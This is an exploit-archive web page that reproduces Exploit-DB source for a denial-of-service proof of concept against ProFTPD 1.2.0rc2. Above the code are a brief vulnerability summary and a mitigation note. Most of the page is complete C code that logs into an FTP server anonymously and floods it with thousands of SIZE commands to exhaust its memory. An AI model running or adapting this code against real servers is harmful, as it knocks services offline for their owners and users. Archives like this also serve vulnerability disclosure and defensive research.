Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Proftpd DoS - exploit.company
header-logo
Suggest Exploit
vendor:
Proftpd
by:
Piotr Zurawski
5.5
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: Proftpd
Affected Version From: 1.2.2000
Affected Version To: 1.2.0(rc2)
Patch Exists: NO
Related CWE:
CPE: proftpd:proftpd:1.2.0
Metasploit:
Other Scripts:
Platforms Tested:

Proftpd DoS

This source code is an example of a memory leakage vulnerability in proftpd-1.2.0(rc2) server. It can cause a denial of service by sending a large number of size commands.

Mitigation:

Apply the appropriate patch or upgrade to a newer version of Proftpd.
Source

Exploit-DB raw data:

/*
 | Proftpd DoS
 | by Piotr Zurawski (szur@ix.renet.pl)
 | This source is just an example of memory leakage in proftpd-1.2.0(rc2)
 | server discovered by Wojciech Purczynski.
 |
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define USERNAME "anonymous"
#define PASSWORD "dupa@dupa.pl"
#define HOWMANY 10000

void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);

int main(int argc, char **argv)
{
  if (!resolve(argv[1],&host))
  {
    fprintf(stderr,"Hostname lookup failure\n");
    exit(0);
  }

  fd=tcp_connect(host,port);
  logintoftp(fd);
  printf("Logged\n");
  sendsizes(fd);

  printf("Now check out memory usage of proftpd daemon");
  printf("Resident set size (RSS) and virtual memory size (VSIZE)");
  printf("fields in ps output");
}

void logintoftp()
{
  char snd[1024], rcv[1024];
  int n;

  printf("Logging " USERNAME  "/"  PASSWORD "\r\n");

  memset(snd, '\0', 1024);
  sprintf(snd, "USER %s\r\n", USERNAME);
  write(fd, snd, strlen(snd));

  while((n=read(fd, rcv, sizeof(rcv))) > 0)
  {
    rcv[n] = 0;
    if(strchr(rcv, '\n') != NULL)break;
  }

  memset(snd, '\0', 1024);
  sprintf(snd, "PASS %s\r\n", PASSWORD);
  write(fd, snd, strlen(snd));

  while((n=read(fd, rcv, sizeof(rcv))) > 0)
  {
    rcv[n] = 0;
    if(strchr(rcv, '\n') != NULL)
      break;
  }
  return;
}

void sendsizes()
{
  char snd[1024], rcv[1024];
  unsigned long loop;

  printf ("Sending %i size commands... \n", HOWMANY);

  for(loop=0;loop<HOWMANY;loop++)
  {
    sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha\n");
    write(fd, snd, strlen(snd));
  }
  return;
}

int tcp_connect(struct in_addr addr,unsigned short port)
{
  int fd;

  struct sockaddr_in serv;
  bzero(&serv,sizeof(serv)); serv.sin_addr=addr;
  serv.sin_port=htons(port);
  serv.sin_family=AF_INET;

  if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)\
  {
    perror("socket");
    exit(0);
  }

  if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
  {
    perror("connect");
    exit(0);
  }

  return(fd);
}

int resolve(char *hostname,struct in_addr *addr)
{
  struct hostent *res;
  res=gethostbyname(hostname);
  if (res==NULL)
    return(0);
  memcpy((char *)addr,res->h_addr,res->h_length);
  return(1);
}

Navigation

Suggest Exploit

Services By CQR